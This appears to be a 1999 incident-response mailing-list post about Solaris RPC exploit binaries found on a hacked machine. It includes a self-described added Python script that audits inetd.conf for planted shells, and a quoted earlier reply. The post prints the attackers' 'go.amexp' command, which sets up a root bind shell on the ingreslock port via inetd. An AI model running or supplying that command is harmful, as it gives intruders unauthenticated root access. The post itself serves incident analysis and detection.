I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

    ./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' > /tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both the tooltalk and
rpc.cmsd attacks.

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since no indirect rpc services execution was
attempted.

This incident is closed.
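The go.amexp line above writes a one-line inetd configuration that binds a root shell to the ingreslock port and starts a second inetd on it. As an added example (not from the original post or from the tools it describes), here is a Python check a responder could run over an inetd.conf-style file, such as a recovered /tmp/.xp or the system's /etc/inet/inetd.conf, to flag entries that spawn a shell or launch a root service from a scratch directory; the field layout is the standard inetd.conf format and the sample configuration is constructed.

```python
import os
from collections import namedtuple

# Fields of one inetd.conf line: port name (resolved through /etc/services,
# e.g. "ingreslock"), socket type, protocol, wait/nowait, account to run as,
# server program (or "internal"), and the argv handed to that program.
InetdEntry = namedtuple("InetdEntry", "service socktype proto wait user server args")

# A service whose program is a login shell is a bind shell, whatever port
# name it hides behind; a root service launched from a scratch directory
# is one a sysadmin did not install.
SHELL_NAMES = {"sh", "ksh", "csh", "bash"}
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/")

def parse_inetd_conf(text):
    """Parse inetd.conf-style text; comments and malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 6:
            entries.append(InetdEntry(*fields[:6], tuple(fields[6:])))
    return entries

def findings(entry):
    """Reasons an entry looks like a planted backdoor (empty list if clean)."""
    reasons = []
    if os.path.basename(entry.server) in SHELL_NAMES:
        reasons.append("server program is a shell")
    if entry.user == "root" and entry.server.startswith(UNTRUSTED_DIRS):
        reasons.append("root service launched from an untrusted directory")
    return reasons

def audit(text):
    """Map each suspicious service name to its list of findings."""
    result = {}
    for entry in parse_inetd_conf(text):
        reasons = findings(entry)
        if reasons:
            result[entry.service] = reasons
    return result

# Constructed sample: stock-looking entries plus the line go.amexp writes.
SAMPLE_CONF = """\
ftp        stream  tcp  nowait  root    /usr/sbin/in.ftpd     in.ftpd
echo       stream  tcp  nowait  root    internal
finger     stream  tcp  nowait  nobody  /usr/sbin/in.fingerd  in.fingerd
ingreslock stream  tcp  nowait  root    /bin/sh               sh
"""
```

Running `audit(SAMPLE_CONF)` reports only the ingreslock entry; a stray inetd started with `-s` on such a file would not show in the system's own inetd.conf, so the process list and listening ports need checking alongside it.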



----- Original Message -----
From: Tabor J . Wells <[EMAIL PROTECTED]>
To: Bob Todd <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?


> On Sat, Aug 21, 1999 at 12:31:18PM -0400,
> Bob Todd <[EMAIL PROTECTED]> is thought to have said:
>
> > While performing an on-site incident response at _______, I found
> > several Solaris-oriented exploit programs including a statd2.6 (others
> > were calendar manager, tooltalk, and lockd?).  Since there is an
> > exploit program for statd on Solaris 2.6, I could conclude that Solaris
> > 2.6 statd is vulnerable to attack.  I have not tried the exploit, but
> > since the machine was probably compromised by one of these programs,
> > the threat seems real!!
>
> And did this server have the statd patch installed (106592-02 on sparc
> and 106593-02 on x86)? Did it have the various security patches for the
> other services mentioned installed as well?
>
> Perhaps the program was part of the exploit which allowed indirect RPC
> calls with statd that was discussed here (and elsewhere) several weeks
> back.
>
> I don't think your conclusion is supported given the information you
> provided. Perhaps you could provide more information about the exploit
> before rushing to claim that there is a new vulnerability.
>
> Tabor
>
> --
> ________________________________________________________________________
> Tabor J. Wells                          [EMAIL PROTECTED]
> Technology Manager                      http://www.smarterliving.com
> Smarter Living, Inc.                    It's your time. It's your money.
>
